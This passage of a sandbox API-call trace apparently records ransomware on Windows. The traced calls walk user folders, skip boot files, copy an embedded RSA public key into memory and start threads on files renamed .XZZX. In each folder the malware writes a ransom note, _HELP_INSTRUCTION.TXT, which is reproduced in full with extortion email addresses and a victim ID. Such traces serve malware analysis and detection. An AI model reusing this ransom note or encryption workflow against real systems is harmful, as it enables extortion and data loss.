possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0195.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd1c [0195.823] CloseHandle (hObject=0xd1c) returned 1 [0195.823] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0195.823] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0195.823] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0195.823] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0195.823] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0195.823] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0195.823] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0195.823] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0195.823] SetErrorMode (uMode=0x1) returned 0x1 [0195.823] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0195.823] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0195.823] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0195.823] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0195.823] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0195.823] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0195.823] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0195.823] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0195.823] SetErrorMode (uMode=0x1) returned 0x1 [0195.824] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT") returned 58 [0195.824] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0195.824] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0195.824] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd1c) returned 0x0 [0195.824] RegQueryValueExW (in: hKey=0xd1c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43afc08, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43afc08*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0195.824] RegCloseKey (hKey=0xd1c) returned 0x0 [0195.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0195.824] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0195.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd1c [0195.824] CloseHandle (hObject=0xd1c) returned 1 [0195.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0195.824] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0195.824] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0195.824] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0195.824] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0195.825] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0195.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0195.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0195.825] SetErrorMode (uMode=0x1) returned 0x1 [0195.825] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0195.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0195.825] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0195.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0195.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0195.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0195.825] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0195.825] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.825] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.825] lstrcmpW (lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpString2="..") returned 1 [0195.825] lstrcmpW (lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpString2=".") returned 1 [0195.825] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.825] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="ntldr") returned 0x0 [0195.825] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="NTLDR") returned 0x0 [0195.825] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.825] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.825] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 46 [0195.825] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") [0195.826] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.826] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0195.826] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0195.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd20 [0195.826] Sleep (dwMilliseconds=0x96) [0195.972] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.972] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0195.972] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0195.972] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0195.973] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0195.973] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0195.973] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0195.973] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0195.973] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0195.973] SetErrorMode (uMode=0x1) returned 0x1 [0195.973] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT") returned 63 [0195.973] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0195.973] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0195.973] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd24) returned 0x0 [0195.973] RegQueryValueExW (in: hKey=0xd24, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43afe38, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43afe38*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0195.973] RegCloseKey (hKey=0xd24) returned 0x0 [0195.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0195.974] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0195.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd24 [0195.974] CloseHandle (hObject=0xd24) returned 1 [0195.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0195.974] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0195.974] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0195.974] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0195.974] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0195.974] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.974] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0195.974] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.974] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.974] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0195.974] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0195.974] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0195.974] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0195.974] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0195.974] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0195.974] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0195.974] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0195.974] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0195.974] SetErrorMode (uMode=0x1) returned 0x1 [0195.975] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0195.975] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0195.975] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0195.975] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0195.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0195.975] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0195.975] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0195.975] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.975] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.975] lstrcmpW (lpString1="07542892440C59CA51177AF248413E12.XZZX", lpString2="..") returned 1 [0195.975] lstrcmpW (lpString1="07542892440C59CA51177AF248413E12.XZZX", lpString2=".") returned 1 [0195.975] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.975] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="ntldr") returned 0x0 [0195.975] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="NTLDR") returned 0x0 [0195.975] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.975] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.975] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0195.975] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") [0195.975] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.975] lstrcpyW (in: lpString1=0x17cf1c, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0195.975] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0195.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd2c [0195.976] Sleep (dwMilliseconds=0x96) [0196.128] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.128] lstrcmpW (lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpString2="..") returned 1 [0196.128] lstrcmpW (lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpString2=".") returned 1 [0196.129] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.129] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="ntldr") returned 0x0 [0196.129] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="NTLDR") returned 0x0 [0196.129] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.129] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.129] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0196.129] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") [0196.129] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.129] lstrcpyW (in: lpString1=0x17cf1c, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") 